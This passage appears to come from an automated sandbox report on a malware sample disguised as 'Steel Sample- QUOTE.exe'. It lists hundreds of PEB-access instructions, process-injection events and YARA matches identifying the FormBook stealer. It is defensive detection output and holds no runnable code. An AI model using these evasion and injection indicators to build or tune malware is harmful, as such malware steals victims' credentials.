            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FF367 mov eax, dword ptr fs:[00000030h]6_2_352FF367
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35247370 mov eax, dword ptr fs:[00000030h]6_2_35247370
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35247370 mov eax, dword ptr fs:[00000030h]6_2_35247370
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35247370 mov eax, dword ptr fs:[00000030h]6_2_35247370
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352E3370 mov eax, dword ptr fs:[00000030h]6_2_352E3370
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523D34C mov eax, dword ptr fs:[00000030h]6_2_3523D34C
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523D34C mov eax, dword ptr fs:[00000030h]6_2_3523D34C
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35239353 mov eax, dword ptr fs:[00000030h]6_2_35239353
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35239353 mov eax, dword ptr fs:[00000030h]6_2_35239353
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35315341 mov eax, dword ptr fs:[00000030h]6_2_35315341
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352633A5 mov eax, dword ptr fs:[00000030h]6_2_352633A5
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352733A0 mov eax, dword ptr fs:[00000030h]6_2_352733A0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352733A0 mov eax, dword ptr fs:[00000030h]6_2_352733A0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352E13B9 mov eax, dword ptr fs:[00000030h]6_2_352E13B9
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352E13B9 mov eax, dword ptr fs:[00000030h]6_2_352E13B9
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352E13B9 mov eax, dword ptr fs:[00000030h]6_2_352E13B9
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3531539D mov eax, dword ptr fs:[00000030h]6_2_3531539D
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3529739A mov eax, dword ptr fs:[00000030h]6_2_3529739A
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3529739A mov eax, dword ptr fs:[00000030h]6_2_3529739A
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FF3E6 mov eax, dword ptr fs:[00000030h]6_2_352FF3E6
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353153FC mov eax, dword ptr fs:[00000030h]6_2_353153FC
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FB3D0 mov ecx, dword ptr fs:[00000030h]6_2_352FB3D0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35315227 mov eax, dword ptr fs:[00000030h]6_2_35315227
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35277208 mov eax, dword ptr fs:[00000030h]6_2_35277208
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35277208 mov eax, dword ptr fs:[00000030h]6_2_35277208
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35269274 mov eax, dword ptr fs:[00000030h]6_2_35269274
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35281270 mov eax, dword ptr fs:[00000030h]6_2_35281270
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35281270 mov eax, dword ptr fs:[00000030h]6_2_35281270
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530D26B mov eax, dword ptr fs:[00000030h]6_2_3530D26B
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530D26B mov eax, dword ptr fs:[00000030h]6_2_3530D26B
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35239240 mov eax, dword ptr fs:[00000030h]6_2_35239240
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35239240 mov eax, dword ptr fs:[00000030h]6_2_35239240
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3527724D mov eax, dword ptr fs:[00000030h]6_2_3527724D
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FB256 mov eax, dword ptr fs:[00000030h]6_2_352FB256
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FB256 mov eax, dword ptr fs:[00000030h]6_2_352FB256
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352552A0 mov eax, dword ptr fs:[00000030h]6_2_352552A0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352552A0 mov eax, dword ptr fs:[00000030h]6_2_352552A0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352552A0 mov eax, dword ptr fs:[00000030h]6_2_352552A0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352552A0 mov eax, dword ptr fs:[00000030h]6_2_352552A0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D72A0 mov eax, dword ptr fs:[00000030h]6_2_352D72A0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D72A0 mov eax, dword ptr fs:[00000030h]6_2_352D72A0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C92BC mov eax, dword ptr fs:[00000030h]6_2_352C92BC
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C92BC mov eax, dword ptr fs:[00000030h]6_2_352C92BC
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C92BC mov ecx, dword ptr fs:[00000030h]6_2_352C92BC
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C92BC mov ecx, dword ptr fs:[00000030h]6_2_352C92BC
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353092A6 mov eax, dword ptr fs:[00000030h]6_2_353092A6
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353092A6 mov eax, dword ptr fs:[00000030h]6_2_353092A6
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353092A6 mov eax, dword ptr fs:[00000030h]6_2_353092A6
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353092A6 mov eax, dword ptr fs:[00000030h]6_2_353092A6
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35315283 mov eax, dword ptr fs:[00000030h]6_2_35315283
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3527329E mov eax, dword ptr fs:[00000030h]6_2_3527329E
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3527329E mov eax, dword ptr fs:[00000030h]6_2_3527329E
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F12ED mov eax, dword ptr fs:[00000030h]6_2_352F12ED
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F12ED mov eax, dword ptr fs:[00000030h]6_2_352F12ED
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F12ED mov eax, dword ptr fs:[00000030h]6_2_352F12ED
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F12ED mov eax, dword ptr fs:[00000030h]6_2_352F12ED
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F12ED mov eax, dword ptr fs:[00000030h]6_2_352F12ED
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F12ED mov eax, dword ptr fs:[00000030h]6_2_352F12ED
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F12ED mov eax, dword ptr fs:[00000030h]6_2_352F12ED
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F12ED mov eax, dword ptr fs:[00000030h]6_2_352F12ED
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F12ED mov eax, dword ptr fs:[00000030h]6_2_352F12ED
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F12ED mov eax, dword ptr fs:[00000030h]6_2_352F12ED
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F12ED mov eax, dword ptr fs:[00000030h]6_2_352F12ED
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F12ED mov eax, dword ptr fs:[00000030h]6_2_352F12ED
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F12ED mov eax, dword ptr fs:[00000030h]6_2_352F12ED
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F12ED mov eax, dword ptr fs:[00000030h]6_2_352F12ED
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_353152E2 mov eax, dword ptr fs:[00000030h]6_2_353152E2
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FF2F8 mov eax, dword ptr fs:[00000030h]6_2_352FF2F8
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352392FF mov eax, dword ptr fs:[00000030h]6_2_352392FF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352EB2F0 mov eax, dword ptr fs:[00000030h]6_2_352EB2F0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352EB2F0 mov eax, dword ptr fs:[00000030h]6_2_352EB2F0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352492C5 mov eax, dword ptr fs:[00000030h]6_2_352492C5
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352492C5 mov eax, dword ptr fs:[00000030h]6_2_352492C5
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526B2C0 mov eax, dword ptr fs:[00000030h]6_2_3526B2C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526B2C0 mov eax, dword ptr fs:[00000030h]6_2_3526B2C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526B2C0 mov eax, dword ptr fs:[00000030h]6_2_3526B2C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526B2C0 mov eax, dword ptr fs:[00000030h]6_2_3526B2C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526B2C0 mov eax, dword ptr fs:[00000030h]6_2_3526B2C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526B2C0 mov eax, dword ptr fs:[00000030h]6_2_3526B2C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526B2C0 mov eax, dword ptr fs:[00000030h]6_2_3526B2C0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523B2D3 mov eax, dword ptr fs:[00000030h]6_2_3523B2D3
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523B2D3 mov eax, dword ptr fs:[00000030h]6_2_3523B2D3
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523B2D3 mov eax, dword ptr fs:[00000030h]6_2_3523B2D3
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526F2D0 mov eax, dword ptr fs:[00000030h]6_2_3526F2D0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3526F2D0 mov eax, dword ptr fs:[00000030h]6_2_3526F2D0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253D20 mov eax, dword ptr fs:[00000030h]6_2_35253D20
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352CFD2A mov eax, dword ptr fs:[00000030h]6_2_352CFD2A
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352CFD2A mov eax, dword ptr fs:[00000030h]6_2_352CFD2A
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253D00 mov eax, dword ptr fs:[00000030h]6_2_35253D00
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35247D75 mov eax, dword ptr fs:[00000030h]6_2_35247D75
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35247D75 mov eax, dword ptr fs:[00000030h]6_2_35247D75
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352EFD78 mov eax, dword ptr fs:[00000030h]6_2_352EFD78
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352EFD78 mov eax, dword ptr fs:[00000030h]6_2_352EFD78
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352EFD78 mov eax, dword ptr fs:[00000030h]6_2_352EFD78
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352EFD78 mov eax, dword ptr fs:[00000030h]6_2_352EFD78
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352EFD78 mov eax, dword ptr fs:[00000030h]6_2_352EFD78
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F9D70 mov eax, dword ptr fs:[00000030h]6_2_352F9D70
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352F9D70 mov eax, dword ptr fs:[00000030h]6_2_352F9D70
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35315D50 mov eax, dword ptr fs:[00000030h]6_2_35315D50
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35315D50 mov eax, dword ptr fs:[00000030h]6_2_35315D50
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35237D41 mov eax, dword ptr fs:[00000030h]6_2_35237D41
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253D40 mov eax, dword ptr fs:[00000030h]6_2_35253D40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253D40 mov eax, dword ptr fs:[00000030h]6_2_35253D40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253D40 mov eax, dword ptr fs:[00000030h]6_2_35253D40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253D40 mov eax, dword ptr fs:[00000030h]6_2_35253D40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253D40 mov ecx, dword ptr fs:[00000030h]6_2_35253D40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253D40 mov ecx, dword ptr fs:[00000030h]6_2_35253D40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253D40 mov eax, dword ptr fs:[00000030h]6_2_35253D40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253D40 mov ecx, dword ptr fs:[00000030h]6_2_35253D40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253D40 mov ecx, dword ptr fs:[00000030h]6_2_35253D40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253D40 mov eax, dword ptr fs:[00000030h]6_2_35253D40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253D40 mov ecx, dword ptr fs:[00000030h]6_2_35253D40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253D40 mov ecx, dword ptr fs:[00000030h]6_2_35253D40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253D40 mov eax, dword ptr fs:[00000030h]6_2_35253D40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253D40 mov eax, dword ptr fs:[00000030h]6_2_35253D40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253D40 mov eax, dword ptr fs:[00000030h]6_2_35253D40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253D40 mov eax, dword ptr fs:[00000030h]6_2_35253D40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253D40 mov eax, dword ptr fs:[00000030h]6_2_35253D40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253D40 mov eax, dword ptr fs:[00000030h]6_2_35253D40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253D40 mov eax, dword ptr fs:[00000030h]6_2_35253D40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35253D40 mov eax, dword ptr fs:[00000030h]6_2_35253D40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3527BD4E mov eax, dword ptr fs:[00000030h]6_2_3527BD4E
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3527BD4E mov eax, dword ptr fs:[00000030h]6_2_3527BD4E
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35301D5A mov eax, dword ptr fs:[00000030h]6_2_35301D5A
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35301D5A mov eax, dword ptr fs:[00000030h]6_2_35301D5A
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35301D5A mov eax, dword ptr fs:[00000030h]6_2_35301D5A
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35301D5A mov eax, dword ptr fs:[00000030h]6_2_35301D5A
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352CDD47 mov eax, dword ptr fs:[00000030h]6_2_352CDD47
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35279DAF mov eax, dword ptr fs:[00000030h]6_2_35279DAF
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3524FDA9 mov eax, dword ptr fs:[00000030h]6_2_3524FDA9
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D5DA0 mov eax, dword ptr fs:[00000030h]6_2_352D5DA0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D5DA0 mov eax, dword ptr fs:[00000030h]6_2_352D5DA0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D5DA0 mov eax, dword ptr fs:[00000030h]6_2_352D5DA0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352D5DA0 mov ecx, dword ptr fs:[00000030h]6_2_352D5DA0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3525DDB1 mov eax, dword ptr fs:[00000030h]6_2_3525DDB1
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3525DDB1 mov eax, dword ptr fs:[00000030h]6_2_3525DDB1
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3525DDB1 mov eax, dword ptr fs:[00000030h]6_2_3525DDB1
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352CDDB1 mov eax, dword ptr fs:[00000030h]6_2_352CDDB1
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523FD80 mov eax, dword ptr fs:[00000030h]6_2_3523FD80
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35239D96 mov eax, dword ptr fs:[00000030h]6_2_35239D96
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35239D96 mov eax, dword ptr fs:[00000030h]6_2_35239D96
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35239D96 mov ecx, dword ptr fs:[00000030h]6_2_35239D96
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FDDC7 mov eax, dword ptr fs:[00000030h]6_2_352FDDC7
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352CDDC0 mov eax, dword ptr fs:[00000030h]6_2_352CDDC0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35243DD0 mov eax, dword ptr fs:[00000030h]6_2_35243DD0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35243DD0 mov eax, dword ptr fs:[00000030h]6_2_35243DD0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530DDC6 mov eax, dword ptr fs:[00000030h]6_2_3530DDC6
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35311C3C mov eax, dword ptr fs:[00000030h]6_2_35311C3C
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530DC27 mov eax, dword ptr fs:[00000030h]6_2_3530DC27
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530DC27 mov eax, dword ptr fs:[00000030h]6_2_3530DC27
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3530DC27 mov eax, dword ptr fs:[00000030h]6_2_3530DC27
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3527BC3B mov esi, dword ptr fs:[00000030h]6_2_3527BC3B
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352C9C32 mov eax, dword ptr fs:[00000030h]6_2_352C9C32
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3531BC01 mov eax, dword ptr fs:[00000030h]6_2_3531BC01
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3531BC01 mov eax, dword ptr fs:[00000030h]6_2_3531BC01
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352CBC10 mov eax, dword ptr fs:[00000030h]6_2_352CBC10
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352CBC10 mov eax, dword ptr fs:[00000030h]6_2_352CBC10
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352CBC10 mov ecx, dword ptr fs:[00000030h]6_2_352CBC10
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35251C60 mov eax, dword ptr fs:[00000030h]6_2_35251C60
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35271C7C mov eax, dword ptr fs:[00000030h]6_2_35271C7C
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FFC4F mov eax, dword ptr fs:[00000030h]6_2_352FFC4F
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35237C40 mov eax, dword ptr fs:[00000030h]6_2_35237C40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35237C40 mov ecx, dword ptr fs:[00000030h]6_2_35237C40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35237C40 mov eax, dword ptr fs:[00000030h]6_2_35237C40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_35237C40 mov eax, dword ptr fs:[00000030h]6_2_35237C40
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_3523DCA0 mov eax, dword ptr fs:[00000030h]6_2_3523DCA0
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FFCAB mov eax, dword ptr fs:[00000030h]6_2_352FFCAB
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FFCAB mov eax, dword ptr fs:[00000030h]6_2_352FFCAB
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FFCAB mov eax, dword ptr fs:[00000030h]6_2_352FFCAB
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 6_2_352FFCAB mov eax, dword ptr fs:[00000030h]6_2_352FFCAB

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: NULL target: C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\4KXbBCJB2PUOofMF0XAGHYJ.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: NULL target: C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\4KXbBCJB2PUOofMF0XAGHYJ.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: NULL target: C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\4KXbBCJB2PUOofMF0XAGHYJ.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeSection loaded: NULL target: C:\Program Files (x86)\PqKEPjJxHxMbaSGERUoNkMaNcxVRKwyySHquejBjagBCjygjehwSfQhkj\4KXbBCJB2PUOofMF0XAGHYJ.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeProcess created: C:\Users\user\Desktop\Steel Sample- QUOTE.exe "C:\Users\user\Desktop\Steel Sample- QUOTE.exe"Jump to behavior
            Source: 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000E.00000002.2964256882.0000000001290000.00000002.00000001.00040000.00000000.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000E.00000000.2533935478.0000000001290000.00000002.00000001.00040000.00000000.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000F.00000002.2964318735.0000000001A80000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000E.00000002.2964256882.0000000001290000.00000002.00000001.00040000.00000000.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000E.00000000.2533935478.0000000001290000.00000002.00000001.00040000.00000000.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000F.00000002.2964318735.0000000001A80000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000E.00000002.2964256882.0000000001290000.00000002.00000001.00040000.00000000.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000E.00000000.2533935478.0000000001290000.00000002.00000001.00040000.00000000.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000F.00000002.2964318735.0000000001A80000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000E.00000002.2964256882.0000000001290000.00000002.00000001.00040000.00000000.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000E.00000000.2533935478.0000000001290000.00000002.00000001.00040000.00000000.sdmp, 4KXbBCJB2PUOofMF0XAGHYJ.exe, 0000000F.00000002.2964318735.0000000001A80000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\Steel Sample- QUOTE.exeCode function: 0_2_00405F0A GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405F0A

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 00000006.00000002.3341106363.0000000036E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.2964739625.00000000028F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.2964626789.00000000024C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.3334791742.0000000035560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.2964789257.00000000030C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
